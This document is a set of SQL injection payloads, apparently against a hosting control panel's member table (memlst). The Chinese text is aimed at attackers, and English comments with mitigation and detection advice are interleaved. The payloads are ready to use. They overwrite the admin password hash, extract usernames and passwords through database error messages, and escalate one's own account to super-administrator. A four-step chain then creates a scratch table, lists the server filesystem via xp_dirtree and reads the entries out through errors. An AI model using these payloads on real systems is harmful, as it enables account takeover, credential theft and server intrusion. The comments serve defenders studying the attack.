-- Stacked-statement injection: the leading quote closes the application's string literal and the
-- trailing "--" comments out the rest of the original query, so the UPDATE overwrites the stored
-- password hash (u_pss) of the 'admin' row in [memlst] with an attacker-chosen value.
-- Mitigation: bind the input as a parameter and run the application under a login that does not
-- hold UPDATE on the credential table. Detection: a quote followed by UPDATE/SET in a request
-- parameter, and any change to memlst.u_pss that did not originate from the password-change flow.
123' UPDATE [memlst] SET u_pss='e10adc3949ba59abbe56e057f20f883e' WHERE u_nme='admin'--
-- Error-based extraction: u_nme and U_pss of one [hzhost]..[memlst] row are concatenated (with
-- char(94) '^' as separator) and compared to an integer, so the server's type-conversion error text
-- carries the credentials back to the client.
-- Mitigation: parameterize the query, never return raw database error messages to clients, and
-- store passwords with a salted, slow hash so a leaked u_pss is not directly usable.
-- Detection: conversion-error responses triggered by requests containing "select top" / "isnull(cast(".
123' and (select top 1 isnull(cast([u_nme] as nvarchar(4000)),char(32))+char(94)+isnull(cast([U_pss] as nvarchar(4000)),char(32)) from (select top 2u_nme,U_pss from [hzhost]..[memlst] where 1=1 order by [u_nme]) t order by [u_nme] desc )>0-- and '1'='1
可以同时爆出一个用户的帐号和密码。想爆出其他用户的语句自己构造吧。
-- Privilege escalation via the same stacked-UPDATE pattern: the attacker raises u_sys and u_pwr on
-- their own [memlst] row. The meaning of the values 6 and 2 is not shown on this page; the
-- surrounding text states the pair yields super-administrator rights.
-- Mitigation: role/privilege columns must not be writable from the application's database login;
-- parameterize all input. Detection: alert on any change to memlst.u_sys / memlst.u_pwr that does
-- not come from the administrative user-management path.
123' UPDATE [memlst] SET u_sys=6 WHERE u_nme='你注册的用户名'--
123' UPDATE [memlst] SET u_pwr=2 WHERE u_nme='你注册的用户名'--
这2句话就能够提升自己为超级管理员
爆路径语句
-- Staging-table setup for the path-disclosure chain: DROP/CREATE of a scratch table (foofoofoo)
-- through the injection point. Succeeding here proves the application login holds DDL rights.
-- Mitigation: grant the web application only DML on the tables it needs, never CREATE/DROP.
-- Detection: unexpected user tables appearing in the application database; DDL statements in the
-- SQL audit log issued by the web login.
第一步:建立表123' ;drop table foofoofoo;create table foofoofoo([id] [int] identity (1,1) not null,[name] [nvarchar] (300) not null,[depth] [int] not null,[isfile] [nvarchar] (50) null);-- and '1'='1
-- Filesystem enumeration: master..xp_dirtree is executed with a UTF-16 hex-encoded path
-- (0x63003a005c00, per the note below) and its directory/file listing is inserted into the staging table.
-- This requires EXECUTE on xp_dirtree, which a web-application login should never have.
-- Mitigation: revoke EXECUTE on master..xp_dirtree (and similar extended procedures) from the
-- application login; run SQL Server under a low-privilege service account.
-- Detection: any xp_dirtree invocation from the application login in the audit log.
第二步:123' ;declare @z nvarchar(4000) set @z=0x63003a005c00 insert foofoofoo execute master..xp_dirtree @z,1,1-- and '1'='1
注意:0x63003a005c00 = C:\ 为sql ENCODE
其他的自己找工具去转吧!
-- Row count of the staging table, leaked through the same integer-comparison conversion error
-- used on line 2. Mitigation and detection are the same: parameterize, hide DB errors from clients,
-- alert on conversion-error responses to crafted requests.
第三步:暴出总数 123' and (select cast(count(*) as varchar(8000))+char(94) from foofoofoo)>0-- and '1'='1
-- Row-by-row read-out of the enumerated paths (isfile, name) from the staging table via the
-- ordered "top N" subquery pattern; the error text carries one entry per request.
-- Mitigation: as above; additionally, drop orphan scratch tables such as foofoofoo during cleanup
-- and rotate credentials once this chain is observed, since earlier steps already exposed them.
第四步:暴出你想要的文件夹名字和文件名字 123' and 0<(select top 1 cast([isfile] as nvarchar(4000))+char(94)+cast([name] as nvarchar(4000)) from (select distinct top 1 * from foofoofoo order by isfile,name) t order by isfile desc,name desc)-- and '1'='1
修改中间红色的1,依次爆出。